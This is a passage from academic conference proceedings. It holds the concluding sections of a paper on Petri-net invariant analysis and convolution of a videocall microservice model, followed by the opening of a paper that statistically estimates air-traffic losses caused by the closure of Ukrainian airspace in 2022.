T10 = [5 0 0 0 5 0 0 0 5 0 5 5 0 0 0 1]^T
T11 = [5 0 0 0 0 5 0 0 5 0 5 0 5 0 0 1]^T
T12 = [5 0 5 0 5 0 0 0 5 0 5 0 0 5 0 1]^T
T13 = [5 0 5 0 0 5 0 0 5 0 5 0 0 0 5 1]^T

P1 = [1 1 1 1 1 0 0 0 1 1]
P2 = [1 0 0 0 0 1 1 1 1 1]

The analysis of the T-invariants of the second submodel MV-1-2v has shown that all their elements are covered by nonzero values, so the second submodel is live and repetitive. Also, all elements of the P-invariants are covered by nonzero values, which confirms the properties of limitation and preservation. The calculation of the rank of the incidence matrix confirms the sufficient controllability of the submodel: rank(W2v) = 8 < min(|T2v|, |P2v|) = 10.

The analysis of the second submodel has also revealed duplication in the branches from the place vertexes p1 and p5 (Fig. 6, b). The submodel is therefore rebuilt while maintaining its functionality (Fig. 7, a). The number of elements of the second submodel has been reduced: the number of transition vertexes decreased by 12.5%, the number of place vertexes by 20%, and the number of arcs by 33.3%. The calculated elements of the T- and P-invariants of the reconstructed submodel MV-1-2p are covered with nonzero values and correspond to the properties of liveness, repeatability, limitation and preservation:

T1 = [0 0 5 5 5 5 0 5 1 0 0 0 0 0]^T
T2 = [5 5 0 0 0 0 5 5 1 0 0 0 0 0]^T
T3 = [0 0 5 0 0 0 0 0 1 5 0 0 0 0]^T
T4 = [5 0 0 0 0 0 0 0 1 0 5 0 0 0]^T
T5 = [0 0 5 5 0 0 0 0 1 0 0 5 0 0]^T
T6 = [5 5 0 0 0 0 0 0 1 0 0 0 5 0]^T
T7 = [0 0 5 5 5 0 0 0 1 0 0 0 0 5]^T

P1 = [5 5 5 5 5 5 5 5]

The calculation of the rank of the incidence matrix of the submodel MV-1-2p confirms a rather high controllability: rank(W2p) = 7 < min(|T2p|, |P2p|) = 8.
Fig. 7. The second and the third submodels of the videocall microservice model MV-1: a) the second rebuilt submodel MV-1-2p, b) the third submodel MV-1-3
Thus, the operation of the second submodel can be considered reliable enough, and it is included as a part of the complete microservice model.

In the analysis of the third submodel MV-1-3 (Fig. 7, b), T- and P-invariants in which all elements are completely covered by nonzero values have been calculated:

T1 = [5 0 5 0 5 2 2 0 7 0 7 1]^T
T2 = [5 0 5 0 5 0 0 0 7 2 5 1]^T
T3 = [0 5 5 5 0 2 2 5 7 0 2 1]^T
T4 = [0 5 5 5 0 0 0 5 7 2 0 1]^T

P1 = [1 1 1 0 0 1 1 1 1 1 1]
P2 = [5 0 0 5 5 5 5 5 5 5 5]

The analysis of the invariants of the submodel MV-1-3 has confirmed compliance with the properties of liveness, repeatability, limitation and preservation. The rank of the incidence matrix is rank(W3) = 9 < min(|T3|, |P3|) = 11, which corresponds to a sufficiently high controllability of the third submodel of the videocall microservice. Compliance with the complete controllability of this submodel will be considered when the submodel is added to the full microservice model.

The submodels are optimized using the convolution method during the assembly of the complete videocall model. The view of the submodel MV-1-1 after convolution (model MV-1-1z) is presented in Fig. 8. The characteristics of the submodel MV-1-1z, represented by its T- and P-invariants, remain completely covered by nonzero values:

T1 = [5 5 0 0 0 5 0 1 0 0]^T
T2 = [1 0 0 1 0 0 0 0 0 1]^T
T3 = [5 0 5 0 5 5 5 1 0 0]^T
T4 = [1 0 1 0 0 0 0 0 1 1]^T

P1 = [1 1 1 1 1 0 0 1]
P2 = [1 1 0 1 0 1 1 1]
The rank of the incidence matrix for the first convoluted submodel MV-1-1z is rank(W1z) = 6 < min(|T1z|, |P1z|) = 8.

At the first stage of the assembly, we connect the first submodel MV-1-1z and the second submodel MV-1-2p into a partial model MV-(1z)-(2p) (Fig. 9); this step is sketched in code after Fig. 9. Since the duplicate branches from the place vertex p5 (Fig. 6, b) are excluded from the second submodel, the vertexes p9 and p10, with their input and output arcs, should be excluded from the first submodel (Fig. 5, b). Connecting vertexes that ensured the closure of the submodels are also excluded; in particular, the vertexes p0, t0, t2 of the second submodel (Fig. 7, a) coincide with the vertexes p1, t4, t1 of the first submodel (Fig. 8), respectively. Simulation of the partial model MV-(1z)-(2p) has established that the initial marking is restored.
Fig. 8. First submodel MV-1-1z after convolution
Fig. 9. Partial model MV-(1z)-(2p) at the first stage of assembly of the model MV-1z
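The assembly step itself, identifying the coinciding connecting vertexes of two submodels, can be sketched as follows. The helper reuses the illustrative Net structure from the earlier sketch, and the mapping in the comment mirrors the vertex identifications described above; all names are assumptions.

```python
# Sketch of submodel assembly: vertexes of net_b that coincide with vertexes
# of net_a are identified via `mapping`; the remaining vertexes of net_b are
# prefixed to keep them distinct.
def assemble(net_a, net_b, mapping):
    ren = lambda v: mapping.get(v, "B_" + v)
    return Net(
        places=net_a.places | {ren(p) for p in net_b.places},
        transitions=net_a.transitions | {ren(t) for t in net_b.transitions},
        arcs=net_a.arcs | {(ren(s), ren(t)) for s, t in net_b.arcs},
    )

# e.g., vertexes p0, t0, t2 of MV-1-2p coincide with p1, t4, t1 of MV-1-1z:
# partial = assemble(mv_1_1z, mv_1_2p, {"p0": "p1", "t0": "t4", "t2": "t1"})
```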
The calculation of the rank of the incidence matrix for the partial model MV-(1z)-(2p), rank(W1-2) = 10 < min(|T1-2|, |P1-2|) = 11, shows a high controllability of the partial model, but the controllability is not yet complete.
The calculation of the invariants for the model MV-(1z)-(2p) yields the following results:

T1 = [1 0 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0]^T
T2 = [5 5 0 0 0 5 5 5 0 0 1 0 0 0 0 0 0 0 0]^T
T3 = [1 0 1 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0]^T
T4 = [5 0 5 0 5 0 0 5 0 0 1 5 5 5 0 0 0 0 0]^T
T5 = [5 0 5 0 5 0 0 0 0 0 1 0 0 0 5 0 0 0 0]^T
T6 = [5 5 0 0 0 0 0 0 0 0 1 0 0 0 0 5 0 0 0]^T
T7 = [5 0 5 0 5 0 0 0 0 0 1 5 0 0 0 0 5 0 0]^T
T8 = [5 5 0 0 0 5 0 0 0 0 1 0 0 0 0 0 0 5 0]^T
T9 = [5 0 5 0 5 0 0 0 0 0 1 5 5 0 0 0 0 0 5]^T

P1 = [1 1 1 1 1 1 1 1 1 1 1]

The analysis of the T-invariants of the partial model MV-(1z)-(2p) has shown that all elements are covered with nonzero values, which corresponds to the observance of the liveness and repeatability properties. All elements of the P-invariant are also covered with nonzero values, which corresponds to the observance of the limitation and preservation properties.

In the second stage of the assembly, the model MV-1z is formed by connecting the partial model MV-(1z)-(2p) (Fig. 9) to the third submodel MV-1-3 (Fig. 7, b). During this assembly, the connecting vertexes are removed from the third submodel, in particular p3, t3, t4, p12, p13, as well as the conditional structures at the vertexes p11, p12, t13 and p11, p13, t14, which are responsible for logging users in, taking into account the labels from the duplicate branches. In the model MV-1z (Fig. 10), the logon of the users and guests of the portal to the videocall session is described by the vertexes p12 and p11, respectively. External guests waiting for permission to log on to the videocall are displayed by the vertex p13.

The results of the analysis of the T-invariants of the MV-1z model have shown that not all elements are covered with nonzero values. The transition vertexes t16 and t18 are not live in these simulation sessions of the model; both vertexes describe the processing of errors that do not occur very often, so these results are not critical. The vertexes t16 and t18 can work under certain conditions reflected in the model: they represent error processing similar to the error processing in the branch passing through the vertex t14. The processing of these errors is provided on the linear part of the code (p8 – t11 – p9 – t12 – p10 – t13), so they can be convoluted.
Fig. 10. Model MV-1z after assembling the three submodels
The calculated T-invariants of the model MV-1z are:

T1 = [7 0 6 1 5 0 0 7 1 2 1 5 5 5 0 0 0 0 0 7 0 0 2 2 0]^T
T2 = [7 0 6 1 5 0 0 7 1 2 1 5 5 5 0 0 0 0 0 5 0 0 0 0 2]^T
T3 = [7 5 1 1 0 5 5 7 1 2 1 0 0 0 0 0 0 0 0 2 5 5 2 2 0]^T
T4 = [7 0 6 1 5 0 0 2 1 2 1 0 0 0 5 0 0 0 0 0 0 0 0 0 2]^T
T5 = [7 5 1 1 0 5 5 7 1 2 1 0 0 0 0 0 0 0 0 0 5 5 0 0 2]^T
T6 = [7 5 1 1 0 0 0 2 1 2 1 0 0 0 0 5 0 0 0 2 0 0 2 2 0]^T
T7 = [7 5 1 1 0 0 0 2 1 2 1 0 0 0 0 5 0 0 0 0 0 0 0 0 2]^T
T8 = [7 5 1 1 0 5 0 2 1 2 1 0 0 0 0 0 0 5 0 2 0 0 2 2 0]^T
T9 = [7 5 1 1 0 5 0 2 1 2 1 0 0 0 0 0 0 5 0 0 0 0 0 0 2]^T

All elements of the S-invariant are covered with nonzero values, which corresponds to the observance of the limitation and preservation properties:

S1 = [14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14]

The rank of the incidence matrix (16 × 25) for the model MV-1z is rank(W_MV-1z) = 16 = min(|T_MV-1z|, |P_MV-1z|) = 16, which determines the complete controllability of the assembled model. The results of the correction of the model MV-1z are presented in Fig. 11; the corrected model is designated MV-1z(1).
Fig. 11. Corrected model MV-1z(1)
The calculation of the invariants of the corrected model MV-1z(1) gives the following results:

T1 = [5 0 5 0 5 0 0 2 0 0 1 0 0 0 5 0 0 2 0 0]^T
T2 = [1 0 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]^T
T3 = [5 0 5 0 5 0 0 2 0 0 1 0 0 2 5 0 2 0 2 0]^T
T4 = [5 5 0 0 0 0 0 2 0 0 1 0 0 0 0 5 0 2 0 0]^T
T5 = [1 0 1 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0]^T
T6 = [5 0 5 0 5 0 0 7 0 0 1 5 5 5 0 0 0 2 0 5]^T
T7 = [5 5 0 0 0 0 0 2 0 0 1 0 0 2 0 5 2 0 2 0]^T
T8 = [5 5 0 0 0 0 0 2 0 0 1 0 0 4 0 5 2 0 0 2]^T
T9 = [5 0 5 0 5 0 0 7 0 0 1 5 5 9 0 0 2 0 0 7]^T
T10 = [5 0 5 0 5 0 0 7 0 0 1 5 5 0 0 0 0 2 5 0]^T
T11 = [5 5 0 0 0 5 5 7 0 0 1 0 0 4 0 0 2 0 0 7]^T
T12 = [5 0 5 0 5 0 0 7 0 0 1 5 5 2 0 0 2 0 7 0]^T
T13 = [5 5 0 0 0 5 5 7 0 0 1 0 0 0 0 0 0 2 0 5]^T

S1 = [14 14 14 14 14 14 14 14 14 14 14 14 14]

The analysis of the T-invariants of the MV-1z(1) model has shown that all their elements are covered by nonzero values, which means that all transition vertexes of the model are live and the net is repetitive. All elements of the P-invariant are covered by nonzero values, which corresponds to the observance of the limitation and preservation properties. The rank of the incidence matrix confirms the complete controllability of the corrected model MV-1z(1): rank(W_MV-1z(1)) = 13 = min(|T_MV-1z(1)|, |P_MV-1z(1)|) = 13. Thus, in the model MV-1z(1), compliance with the dynamic characteristics is fully confirmed, and the model can be used to correct the microservice project. It can also be supplemented with other models in which the above dynamic characteristics are observed.
4 Results

The characteristics of the built submodels and of the videocall microservice model are presented in Table 1. As can be seen from the table, the built submodels are rebuilt until the elements of the T- and P-invariants are completely covered by nonzero values, and until the models become completely controllable. In the submodels, the rank of the incidence matrix remains one or two units less than the power of the smaller of the sets of transition vertexes |T| and place vertexes |P|, due to the use of additional vertexes that do not reflect the basic logic of the microservice but ensure the closure of the model.

Table 1. Characteristics of the models built within the analysis of the videocall microservice model

№ | Model | Power of the set of transition vertexes |T| | Power of the set of place vertexes |P| | Coverage of T-invariants | Coverage of P-invariants | Rank of the matrix W | Controllability
1 | MV-1 | 31 | 24 | −7 | −2 | 23 | non-full
2 | MV-1-1 | 15 | 13 | −2 | −2 | 11 | non-full
3 | MV-1-1p | 15 | 13 | full | full | 11 | non-full
4 | MV-1-1z | 10 | 8 | full | full | 6 | non-full
5 | MV-1-2 | 16 | 10 | full | full | 8 | non-full
6 | MV-1-2p | 14 | 8 | full | full | 7 | non-full
7 | MV-1-3 | 11 | 11 | full | full | 9 | non-full
8 | MV-1z-2p | 19 | 11 | full | full | 10 | non-full
9 | MV-1z | 25 | 16 | −2 | full | 16 | full
10 | MV-1z(1) | 20 | 13 | full | full | 13 | full
When assembling the model, a decrease in the difference between rank(W) and min(|T|, |P|) is observed, which is associated with the gradual debugging of the model and with the decreasing number of additional vertexes, and is reflected by the controllability property (Fig. 12; the gap can be recomputed from Table 1, as the sketch after the figure shows).
Fig. 12. Controllability property of submodels, partial model and the full model of videocall microservice
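The controllability gap plotted in Fig. 12 can be recomputed directly from Table 1; the following small Python sketch does exactly that, with the numbers copied from the table.

```python
# Controllability gap min(|T|, |P|) - rank(W) for the models of Table 1;
# a zero gap corresponds to full controllability.
models = [
    ("MV-1", 31, 24, 23), ("MV-1-1", 15, 13, 11), ("MV-1-1p", 15, 13, 11),
    ("MV-1-1z", 10, 8, 6), ("MV-1-2", 16, 10, 8), ("MV-1-2p", 14, 8, 7),
    ("MV-1-3", 11, 11, 9), ("MV-1z-2p", 19, 11, 10), ("MV-1z", 25, 16, 16),
    ("MV-1z(1)", 20, 13, 13),
]
for name, t, p, rank_w in models:
    print(f"{name:9s} gap = {min(t, p) - rank_w}")
```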
5 Discussion

Submodels can have a small difference between the rank of the incidence matrix WM and the minimum of the powers of the set of place vertexes and the set of transition vertexes, min(|TM|, |PM|), which is often caused by the need for additional vertexes used to close the submodels. Such a closure is required for the analysis with the calculation of invariants. When assembling the submodels into partial models, the difference between the rank of the matrix WM and min(|TM|, |PM|) will decrease if the rank of the matrix does not indicate the presence of a deadlock [11], and in the full model it should be zero: rank(WM) = min(|TM|, |PM|). In cases where the difference between rank(WM) and min(|TM|, |PM|) is caused by specific problems in the operation of the model, these problems should be identified when analyzing the invariants of the partial or complete model. If fully corrected modules are connected to a fully corrected model, its characteristics do not change.
6 Conclusions

The paper presents a convolution method that reduces the dimension of a Petri-net-based simulation model by transforming the models of software components. This transformation is carried out in preparation for the analysis of dynamic characteristics by the invariant method. The application of the convolution method as a part of the combined approach to the simulation modeling of systems with parallelism is shown on the videocall microservice model.

A simulation model of the microservice based on Petri nets is constructed, its dynamic properties are analyzed, and problems are revealed. Based on the results of the analysis, the model is divided into three submodels, each of which describes a separate problem. The submodels are analyzed, and solutions to overcome the identified problems are proposed. During the analysis and recomposition of the submodels into a holistic model, the size of the model is reduced by 35% (in the power of the set of transition vertexes |T|).

The proposed solutions are fully consistent with the properties of liveness, limitation and preservation [11]. The conditions of full controllability of the model are also observed, which is an
important indicator of the quality of the proposed design solutions. The obtained model MV-1z(1) can be used to correct the code of the videocall microservice in order to increase the reliability of its operation and to facilitate the maintenance of the studied microservice.

The scientific novelty of the presented work consists in proving the possibility of applying the combined approach to the simulation modeling of systems with parallelism in the case when the studied system is divided into several subsystems for the convenience of analysis. At the same time, the analysis of dynamic properties according to the proposed method of the combined approach requires an artificial closure of the subsystems, for which additional arcs are used. Such a solution leads to a decrease in the controllability of the subsystems (rank(Wi) < min(|Ti|, |Pi|)) even in the case of the correction of the detected conflict situations. But when assembling the subsystems into a complete system, it is possible to achieve full controllability of the system if all detected errors are corrected.

The practical value of the work lies in extending the application of the combined approach to the simulation modeling of systems with parallelism, together with the convolution method, to identify potential explicit and implicit conflict situations in software models, as well as to check corrective design solutions that increase software reliability and facilitate its operation. Further research on this topic will be devoted to increasing the effectiveness of the tools for building a simulation model and correcting it when conflict situations are detected. Some solutions to this problem have been presented in [2] and [15].
References

1. Sommerville, I.: Software Engineering, 6th edn., p. 693. Addison Wesley Longman Publishing Co., Inc., Lebanon (2001). ISBN 978-0-201-39815-1
2. Suprunenko, O.: Combined approach architecture development to simulation modeling of systems with parallelism. East.-Eur. J. Enterp. Technol. 4(112), 74–82 (2021). https://doi.org/10.15587/1729-4061.2021.239212
3. Stoian, V.A.: Modeling and Identification of System Dynamics with Distributed Parameters. Kyivskyi Universytet, Kyiv (2008)
4. Nesterenko, B.B., Novotarskiy, M.A.: Formal Tools for Modeling Parallel Processes and Systems. Prazi Instytutu Matematyky NAN Ukrainy, vol. 90. Instytut Matematyky, Kyiv (2012)
5. Jensen, K., Rozenberg, G.: High-level Petri Nets: Theory and Application. Springer, Heidelberg (2012). https://doi.org/10.1007/978-3-642-84524-6
6. Boer, E.R., Murata, T.: Generating basis siphons and traps of Petri nets using the sign incidence matrix. IEEE Trans. Circuits Syst. I: Fundam. Theory Appl. 41(4), 266–271 (1994). https://doi.org/10.1109/81.285680
7. Glomodza, D.K.: Application of the invariant method to the analysis of colored Petri nets with deadlocks. Visnyk NTUU KPI. Informatyka, Upravlinnia ta Obchysliuvalna Tekhnika 64, 38–46 (2016)
8. Genovese, F.R.: The Essence of Petri Net Gluings (2019). https://www.researchgate.net/publication/335712908_The_Essence_of_Petri_Net_Gluings
9. Lomazova, I.A.: Nested Petri Nets: Modeling and Analysis of Distributed Systems with an Object Structure. Nauchny Mir, Moscow (2004)
10. Peterson, J.L.: Petri Net Theory and the Modeling of Systems. Prentice-Hall, Englewood Cliffs (1981)
11. Suprunenko, O.O., Onyshchenko, B.O., Grebenovych, J.E.: Analysis of hidden errors in the models of software systems based on Petri nets. Electron. Model. 44(2), 38–50 (2022). https://doi.org/10.15407/emodel.44.02.038
12. van der Aalst, W.M.P.: Business process management: a comprehensive survey. ISRN Softw. Eng. 1–37 (2013). https://doi.org/10.1155/2013/507984
13. van Hee, K., Sidorova, N., Voorhoeve, M.: Soundness and separability of workflow nets in the stepwise refinement approach. In: van der Aalst, W.M.P., Best, E. (eds.) ICATPN 2003. LNCS, vol. 2679, pp. 337–356. Springer, Heidelberg (2003). https://doi.org/10.1007/3-540-44919-1_22
14. Vasil'ev, V.V., Kuzmuk, V.V.: Petri Nets, Parallel Algorithms and Modeling of Multiprocessor Systems. Naukova Dumka, Kyiv (1990)
15. Suprunenko, O.O., Grebenovych, J.E.: Instrumental Tools for Component-Oriented Modeling of Software Systems and PN-Patterns: Monograph. Publisher Chabanenko Yu.A., Cherkasy (2022)
System Information Technology in Complex Systems Modeling
Impact of Closed Ukrainian Airspace on Global Air Transport System

Oleg Ivashchuk and Ivan Ostroumov

National Aviation University, Kyiv, Ukraine
[email protected]
Abstract. The Ukrainian airways network is a part of the global air transportation system. The Russian military invasion of Ukraine on February 24, 2022 has resulted in the closure of a huge part of the air traffic network, which causes serious problems for global air transportation. The geometry of the closed airspace seriously affects direct connections from Asia to North America and European countries. In the paper, we provide a statistical analysis of scheduled air traffic with direct connections to and from airports inside Ukraine. The air traffic loss is estimated by cumulated functions of the total trajectory length, the total flight time, the number of seats not provided, and the available seat-kilometers parameter. The distribution of these parameters is studied for each airline. We also provide an analysis of re-planned trajectories for transit flights around the closed airspace. The obtained results indicate a significant increase in trajectory length, flight time, amount of fuel burned, and additional carbon emission into the atmosphere.

Keywords: Modeling of air traffic · statistical analysis · air transport system · Ukrainian airspace · air traffic flow
1 Introduction

Aviation plays an important role in the global transport system. Air transport makes it possible to move passengers and cargo quickly over long distances around the globe. Airplanes use a wide network of airways, structured by altitude, to travel conveniently and quickly between any places in the whole world. Millions of people use air transport every year. In 2019, passenger traffic reached 8.6 billion revenue passenger-kilometers, which was 4.9% higher than in 2018 [1]. This indicates the high interest in this type of transport in different sectors of business. The global Covid-19 pandemic caused a drop in demand for air transport and reduced the speed of aviation development [2–4]. Multiple restrictions and closed airspaces around the world reduced the revenue passenger-kilometers parameter by 90% in the second quarter of 2020 compared to the pre-pandemic period of 2019 [5]. The civil aviation market demonstrates a slow rate of development due to multiple domestic restrictions and the correlation with the level of economic development [6, 7].

In addition to the Covid-19 pandemic disaster, the global air transportation system was affected by the simultaneous closure of huge parts of airspace caused by Russia's military
invasion of Ukraine at the end of February 2022. The whole Ukrainian and Belarusian airspace and limited volumes of Russian airspace have been closed [8]. Together, all these volumes built a barrier for air flows from Asian countries to Europe and North America. Hundreds of flights have been re-planned to avoid entering risky regions. Subpolar flights from North America to Central Asia now fly around the closed volume, which, due to its geographical location, significantly increases the length of the route and thereby fuel costs and CO2 emissions. In addition, this situation caused unrest in the aviation insurance and leasing market, which also created additional difficulties for air carriers.

Since the beginning of Russia's military invasion of Ukraine, various sanctions have been applied against Russia, including against its aviation. Many countries around the globe closed their airspaces for aircraft registered in Russia. As a result, thousands of flights have been canceled. To maintain potential connections with Russian airlines, passenger flows have been re-planned through a number of Asian hub airports. Due to the military actions, the whole airspace volume of Ukraine is still closed. All flights to and from departure and destination airports within Ukrainian airspace have been canceled.

In the current study, we estimate the impact of the closed Ukrainian airspace on the global air transport system. The main objective of the article is to perform a preliminary analysis of the losses in air navigation infrastructure and to estimate the total losses in air traffic for scheduled flights in Ukrainian airports, by operating airlines. We also provide an analysis of trajectory modifications for transit flights around the closed volumes.
2 Materials and Methods

Ukrainian airspace consists of five flight information regions: L'viv, Kyiv, Dnipropetrovsk, Simferopol, and Odesa [9, 10]. The ground surveillance network includes 16 en-route and 11 terminal surveillance radars [11, 12]. A few multilateration systems are in use, including at the UKBB airport. The navigational aids network consists of 9 single distance measuring equipment (DME) stations (KSN, KVR, BAH, RVN, TER, STB, UZH, VIN, YHT) and 8 high-altitude collocated DME and VHF Omnidirectional Range stations (BRP, DNP, KVH, IVF, LIV, KHR, ODS, SLV) [9].

DME includes an on-board interrogator and a ground network of transponders. During the DME measuring cycle, the interrogator transmits a set of interrogations to the ground station; from the reply signals of the ground transponder, the distance between the airplane and the ground station is measured automatically. The measured distances may be used for holding a constant trajectory during airplane operation in the vicinity of an airport. A pair of DME stations is used to determine the airplane position during the en-route phase of flight; a simple illustration of this follows Fig. 1. Nowadays, DME is used as the main stand-by positioning sensor on board airplanes. The ground network of navigational aids is represented in Fig. 1. Local navigational aids are a part of the global navigational aids network. Changes in the configuration of the local network affect the global service volume of DME, decrease the number of pairs available for DME/DME navigation, and reduce the performance of on-board positioning by pairs of navigational aids [13, 14].

As a result of the military actions, most surveillance radars have been affected. The infrastructure of the areas where active military operations took place has been destroyed or damaged significantly. The ground infrastructure of the airports of Chernihiv, Sumy, Kharkiv, Kherson, Mykolaiv, and Zaporizhzhia has been affected.
Fig. 1. Ukrainian network of ground DME transponders
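As a simple illustration of the DME/DME positioning mentioned above, the sketch below intersects two range circles in a flat-earth approximation. Real avionics work in geodetic (WGS-84) coordinates, so this is only a toy model.

```python
# Toy DME/DME fix: the airplane lies at one of the two intersection points of
# the range circles around two ground stations (planar approximation).
import math

def dme_dme_fix(x1, y1, r1, x2, y2, r2):
    d = math.hypot(x2 - x1, y2 - y1)            # baseline between stations
    a = (r1**2 - r2**2 + d**2) / (2 * d)        # along-baseline offset
    h = math.sqrt(max(r1**2 - a**2, 0.0))       # off-baseline offset
    xm, ym = x1 + a * (x2 - x1) / d, y1 + a * (y2 - y1) / d
    return ((xm + h * (y2 - y1) / d, ym - h * (x2 - x1) / d),
            (xm - h * (y2 - y1) / d, ym + h * (x2 - x1) / d))

# Two candidate fixes; the ambiguity is resolved by a third range or by the
# previous track: dme_dme_fix(0, 0, 5, 8, 0, 5) -> ((4.0, -3.0), (4.0, 3.0))
```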
Ground infrastructure plays an important role in radio equipment maintenance and repair [15–17]. The navigational aids of Kherson (KHR), Mariupol (MRP), and Bakhmach (BAH) are located in places of active military actions [18] and have probably been out of work due to significant damage. Changes in the configuration of the navigational aids network have decreased the positioning performance of on-board equipment [19–21]. Also, the operation of various civil aviation services is under attack on the cybersecurity side [22, 23].

Closed airspace has a significant impact on the overall air traffic system. The Russian military invasion of Ukraine affects operations in the Flight Information Regions of Kyiv (UKBU and UKBV), Dnipropetrovsk (UKDV), Lviv (UKLV), Odesa (UKOV), Simferopol (UKFV), Chisinau (LUUU), Minsk (UMMV), Moscow (UUWV), and Rostov-na-Donu (URRV) [8]. In addition, the sanctions against Russia have made the whole Russian airspace closed for the operation of many airlines. All the closed airspaces are in contact with each other, and the configuration of the total closed airspace creates a significant area to avoid. The geometry of the closed airspace is presented in Fig. 2.

The geometry of the joined closed volume causes significant difficulties for polar flights from North America to Asia. Since all civil aviation flights performing passenger services are flights with mandatory use of controlled airspace, they are performed on pre-established routes or in free-route airspace areas. Therefore, the closure of the airspace has affected transit flights, which are now being re-routed to avoid passing through this volume. The new trajectories increase the length of the route, which increases fuel consumption, carbon emissions, and, for end users, ticket prices. Direct connections between Northern Europe and Asian airports are affected as well. In addition, many western Asian countries have their own limitations on the use of some parts of their airspace; as an example, the airspace of Afghanistan is still closed for entry at any altitude. Such limitations cause multiple difficulties in the trajectory planning phase. A safe airplane trajectory is a polygonal chain that bends to avoid entering the restricted airspace volumes, with the lowest distance as the main criterion of effectiveness.
Fig. 2. The geometry of closed airspace
In the paper, we use statistical analysis of air traffic data to identify the losses of the airlines operating in Ukraine caused by the airspace closure and to measure the effect of re-planning airplane trajectories for transit flights. We propose a cost accumulation method to estimate airline losses, which is based on the statistical processing of data on previously performed flights, the estimation of scheduled traffic on a weekly basis, and the prediction of future flights. The prediction assumes a constant traffic flow based on scheduled flights. The total losses of each airline on a particular day of prediction are estimated as a cumulative function for each parameter separately by the following equation:

L(p, a) = Σ_{i=1}^{n} l_i(p, a),   (1)

where L(p, a) is the total loss of the airline a in the particular parameter p for n days of accumulation; n is the number of days of data analysis; l_i(p, a) is the daily loss for the i-th day of prediction.
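A minimal sketch of how Eq. (1) might be implemented is shown below; the flight-record layout and field names such as 'length_km' are illustrative assumptions, not from the paper.

```python
# Hedged sketch of the cost accumulation method of Eq. (1): weekly scheduled
# flights are projected onto every day of the closure period, and the daily
# losses l_i(p, a) are summed per airline a and parameter p.
from collections import defaultdict
from datetime import date, timedelta

def accumulate_losses(schedule, start, n_days):
    """schedule: iterable of dicts with 'airline', 'weekday' (0-6) and the
    loss parameters; returns L[airline][parameter] after n_days."""
    L = defaultdict(lambda: defaultdict(float))
    for i in range(n_days):
        day = start + timedelta(days=i)
        for f in schedule:
            if f["weekday"] == day.weekday():        # flight scheduled today
                for p in ("length_km", "flight_h", "seats"):
                    L[f["airline"]][p] += f[p]
    return L

# e.g., the 63-day closure window studied in the paper:
# losses = accumulate_losses(flights, date(2022, 2, 24), 63)
```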
3 Experiments

In our study, we use a database of archived flights. The database includes airplane trajectories obtained under the Automatic Dependent Surveillance-Broadcast (ADS-B) concept. According to ADS-B, each airspace user is required to use a specific transponder on board to share position and identification information. A network of ground equipment receives all ADS-B reports, which can be easily decoded and stored in a database [24, 25]. We use data recorded by the ADS-B receiver located at the National Aviation University (Kyiv), which mostly covers air traffic in the central part of Ukraine. The database of the Ukrainian air navigation service provider is used to analyze air traffic within Ukrainian airspace. We also use the FlightAware database [26] to get air traffic data globally. From these three databases, we extract airplane identification numbers, the date/time of take-off and landing, and the departure and destination airports. The airplane identification code is related to the flight number and the airline providing the particular flight. A table with these data is used as the input for air traffic data processing.

Air traffic data for the last three months have been processed to detect scheduled flights from Ukrainian airports. All scheduled flights are repeated weekly and can be used to predict air traffic on a timetable basis. We identify most scheduled flights from the following Ukrainian airports: Boryspil (UKBB), Zhuliany (UKKK), Lviv (UKLL), Odesa (UKOO), Kharkiv (UKHH), Zaporizhzhia (UKDE), Dnipro (UKDD) and Ivano-Frankivsk (UKLI). All these airports are international, so they can accept not only domestic but also international flights. There are dozens of destinations and hundreds of flights each week. The air traffic database includes 76 unique flight connections with destinations around the globe. The flight connections with Ukrainian airports are presented in the form of a directed graph in Fig. 3.

We perform statistical processing [27, 28] of the available surveillance data on air traffic in Ukraine with the help of specially developed software in a Matlab environment. The developed software includes three main modules: data input, statistical data processing, and visualization. The data input module supports reading data from a file with the extension ".xls" or ".xlsx". The input file includes a table with the following columns: airline identification code, airplane type code, flight number, date of flight, length of the performed trajectory in NM, time of flight, and the codes of the departure and destination airports. The user selects the file location with the particular table structure after the software runs. The data input module reads the selected file and saves each column of the input table in a separate variable. Rows of the input table with format errors are listed in a text file for input data correction.

In the statistical data processing module, first of all, a timetable of scheduled and arrived airplanes is built based on the unique flight identification code. The losses of each airline are estimated in terms of the total trajectory length, flight time, available seats, and available seat-kilometers. The results of the statistical data processing are accumulated for each day of prediction. The obtained results are plotted in the graphs of the visualization module as cumulated function distributions of each parameter by airline. Also, the network of airline connections based on the input dataset is represented in the form of a directed graph, which helps to identify the most loaded airport as the node with the highest degree (a small sketch of this step follows Fig. 3).
Fig. 3. Directed graph of flight connections with Ukrainian airports
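The graph-degree step can be sketched as follows; the flight rows shown are hypothetical examples, not data from the paper.

```python
# Sketch of the connection-graph step: flights are aggregated into a set of
# directed edges, and the busiest airport is found as the node with the
# highest degree (in-degree plus out-degree over distinct connections).
from collections import Counter

rows = [("PS101", "UKBB", "EGLL"), ("PS102", "EGLL", "UKBB"),
        ("FR3070", "UKLL", "EPKK")]              # (flight, dep, dest) examples

edges = {(dep, dest) for _, dep, dest in rows}
degree = Counter()
for dep, dest in edges:
    degree[dep] += 1
    degree[dest] += 1
print("most loaded airport:", degree.most_common(1)[0])
```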
The results of the data analysis indicate that the scheduled passenger flights have been performed by 28 different airlines operating in Ukrainian airports. We assume constant scheduled flights to predict the air traffic distribution over the 63 days of airspace closure. We use the time frame from February 24 to April 27, 2022 for the scheduled air traffic prediction.
4 Results

The total losses in air traffic can be estimated by the cumulative function (1) of the total trajectory length for the flights from Ukrainian airports. The results for the losses in total trajectory length are presented in Fig. 4. The total length losses reach 16 M km. We also analyze the part of each airline in the total length losses. The cumulated function of the length losses for the top five operators is presented in Fig. 4. Ukraine International Airlines, the largest airline in the Ukrainian market, suffers losses in total flight length at a level of 5.4 M km. The total flight length also characterizes the losses of air navigation service providers that cannot be realized due to canceled flights. Each user of the airspace pays fixed charges based on the trajectory length; therefore, the losses of each air navigation provider are identical to the total losses in trajectory length.
Fig. 4. Losses in total trajectory length by operated airlines
Taking into account the available data on the airplane types used on scheduled flights, it is possible to estimate the losses in available seats for each airline separately (Fig. 5).
Fig. 5. Losses in the number of available seats
